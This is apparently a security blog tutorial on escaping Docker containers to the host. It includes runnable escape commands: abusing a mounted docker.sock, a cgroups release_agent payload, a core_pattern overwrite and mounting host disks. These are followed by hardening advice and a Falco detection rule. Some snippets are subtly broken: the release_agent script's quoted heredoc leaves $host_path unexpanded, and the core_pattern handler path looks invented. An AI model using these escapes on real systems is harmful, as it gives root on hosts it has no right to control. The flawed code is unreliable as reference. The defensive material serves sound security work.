Disclaimer: This article is for education and authorized security testing only. Run these techniques exclusively against systems you own or have explicit, written permission to test. Container escape on production infrastructure without authorization is illegal and unethical.
Introduction / Overview
Containers are often mistaken for security boundaries. They are not. A container is a Linux process with namespaces, cgroups, and capability restrictions wrapped around it — all of which share the host kernel. When a workload is misconfigured (or an attacker chains a kernel bug), that "boundary" dissolves and you land on the host as root.
In this article you'll learn the most reliable, real-world container escape primitives: the privileged container, abusing a host mount, the classic cgroups release_agent trick, leaking host context through /proc, and what CAP_SYS_ADMIN actually unlocks. We'll walk through a reproducible lab, then give the blue team equal time with concrete detection and hardening guidance.
How it works / Background
A container's isolation comes from three kernel features:
- Namespaces (
pid,net,mnt,uts,ipc,user) give the process a private view of system resources. - cgroups limit and account for resource usage (CPU, memory, devices).
- Capabilities slice
root's powers into ~40 distinct bits. A default Docker container drops dangerous ones likeCAP_SYS_ADMINandCAP_SYS_MODULE.
Escape happens when one of these guardrails is removed or abused:
--privilegeddisables all of them: full capability set, no seccomp/AppArmor confinement, and host devices appear under/dev.- A host directory bind-mounted into the container (e.g.
-v /:/hostor a mounted Docker socket) hands you the filesystem directly. CAP_SYS_ADMINlets you callmount(2), manipulate cgroups, and set up therelease_agentescape./procexposes host-level knobs like/proc/sys/kernel/core_patternand host PIDs when the PID namespace is shared.
Prerequisites / Lab setup
You need a Linux host with Docker and root inside the test container. Spin up a deliberately weak target:
# Privileged container (worst case)
docker run --rm -it --privileged --name escape-lab ubuntu:22.04 bash
# Or: capability-only target
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined \
ubuntu:22.04 bashBashInside the container, confirm what you're working with:
# What capabilities do we have?
capsh --print | grep sys_admin
# Are we privileged? Check device access.
ls -la /dev | head
# Decode the bounding set quickly
grep CapEff /proc/self/status
# CapEff: 000001ffffffffff -> full set == privilegedBashcapsh --decode=000001ffffffffff confirms the effective set. A value of 000001ffffffffff means every capability is present.
Attack walkthrough / PoC
1. The mounted Docker socket
The single most common finding. If /var/run/docker.sock is mounted into the container, you control the host's Docker daemon and can launch a new privileged container that mounts the host root:
# Detect it
ls -la /var/run/docker.sock
# If the docker CLI is present:
docker run -v /:/host --rm -it alpine chroot /host sh
# You are now root on the host filesystem.Bash2. cgroups release_agent escape (needs CAP_SYS_ADMIN)
The classic notify_on_release / release_agent technique. With CAP_SYS_ADMIN you can mount an RDMA/memory cgroup, set a host-side release_agent, and have the kernel execute it as root on the host when the last task leaves the cgroup.
# Mount a cgroup controller we control
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
# Enable release notification
echo 1 > /tmp/cgrp/x/notify_on_release
# Find the container's path on the host via the overlay mount
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab | head -1)
# Point release_agent at a script on the HOST filesystem
echo "$host_path/cmd" > /tmp/cgrp/release_agent
# Drop the payload
cat > /cmd <<'EOF'
#!/bin/sh
ps aux > "$host_path/output"
EOF
chmod a+x /cmd
# Trigger: spawn a process that immediately exits the cgroup
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Host-side output now contains host process list
cat /outputBashNote: this technique works on cgroup v1. Many modern distros default to cgroup v2 (unified hierarchy), where release_agent is not directly writable the same way — a useful detail when scoping an engagement.
3. core_pattern via /proc (needs CAP_SYS_ADMIN + same mount ns reach)
/proc/sys/kernel/core_pattern is a host-global setting. If writable, you redirect crash handling to a binary that runs as root on the host:
echo "|/proc/sys/kernel/core_pattern_handler %P" > /proc/sys/kernel/core_pattern
# Then trigger a segfault in a process to invoke the handler.Bash4. Privileged: mount the host disk directly
With --privileged, host block devices are visible. Just mount the root partition:
fdisk -l # enumerate host disks
mkdir /mnt/host
mount /dev/sda1 /mnt/host # or the relevant root partition
chroot /mnt/host # full host root shellBash5. Known CVEs worth remembering
- CVE-2019-5736 — overwriting the host
runcbinary from inside a container, leading to root on the host. - CVE-2022-0492 — cgroups v1
release_agentescape achievable from an unprivileged container in certain configs because the capability check was missing. - CVE-2024-21626 — runc file-descriptor leak (
WORKDIR/ leaked fd) enabling escape duringdocker build/run.
Mermaid diagram

The diagram shows four escape paths — Docker socket, privileged disk mount, CAP_SYS_ADMIN abuse, and runc CVEs — all converging on root code execution on the host.
Detection & Defense (Blue Team)
Defense matters as much as the attack. Apply these in layers.
1. Never run --privileged; drop capabilities by default.
docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE \
--security-opt no-new-privileges \
--read-only myimageBashIn Kubernetes, enforce this with Pod Security Standards (restricted) or an admission controller:
securityContext:
privileged: false
allowPrivilegeEscalation: false
readOnlyRootFilesystem: true
capabilities:
drop: ["ALL"]YAML2. Never mount the Docker socket into a workload. If a build system needs Docker, use rootless mode, Kaniko, or BuildKit instead.
3. Keep seccomp and AppArmor/SELinux enabled. Docker's default seccomp profile blocks mount(2), ptrace across namespaces, and many escape syscalls. --security-opt apparmor=unconfined and --security-opt seccomp=unconfined should be treated as red flags in audits.
4. Use user namespaces / rootless containers so in-container root maps to an unprivileged host UID.
5. Patch runc, containerd, and the kernel — CVE-2019-5736 and CVE-2024-21626 were both fixed in runc; pin minimum versions.
6. Detection at runtime. Deploy Falco with rules that fire on escape behavior:
- rule: Detect release_agent File Container Escapes
condition: open_write and fd.name endswith release_agent
output: "Possible cgroup escape (file=%fd.name proc=%proc.cmdline)"
priority: CRITICALYAMLFalco's default ruleset already flags "Launch Privileged Container", "Mount Launched in Privileged Container", and writes to sensitive /proc paths. Pair this with auditd watches on core_pattern and release_agent, and scan images/configs in CI with kube-bench and trivy config.
7. Audit for the markers an attacker looks for: mounted docker.sock, hostPath volumes, hostPID: true, and CAP_SYS_ADMIN. These map to MITRE ATT&CK T1611 — Escape to Host.
For related lateral movement and privilege concepts, see Linux privilege escalation techniques, Kubernetes RBAC abuse, and Docker security hardening.
Conclusion
Container escape is almost always a configuration problem, not a kernel-bug problem. The four primitives — privileged mode, host mounts (especially docker.sock), CAP_SYS_ADMIN-driven cgroups//proc abuse, and unpatched runc — account for the overwhelming majority of real-world breakouts. As an attacker, enumerate capabilities and mounts first. As a defender, drop capabilities, forbid the socket, keep seccomp/AppArmor on, patch runc, and watch for the escape signatures with Falco. Treat the container as one layer of defense, never the only one.
References
- MITRE ATT&CK — T1611 Escape to Host: https://attack.mitre.org/techniques/T1611/
- HackTricks — Docker Breakout / Privilege Escalation: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security
- CVE-2019-5736 (runc): https://nvd.nist.gov/vuln/detail/CVE-2019-5736
- CVE-2022-0492 (cgroups release_agent): https://nvd.nist.gov/vuln/detail/CVE-2022-0492
- CVE-2024-21626 (runc fd leak): https://nvd.nist.gov/vuln/detail/CVE-2024-21626
- Falco rules: https://github.com/falcosecurity/rules
- NIST SP 800-190, Application Container Security Guide: https://csrc.nist.gov/pubs/sp/800/190/final



Comments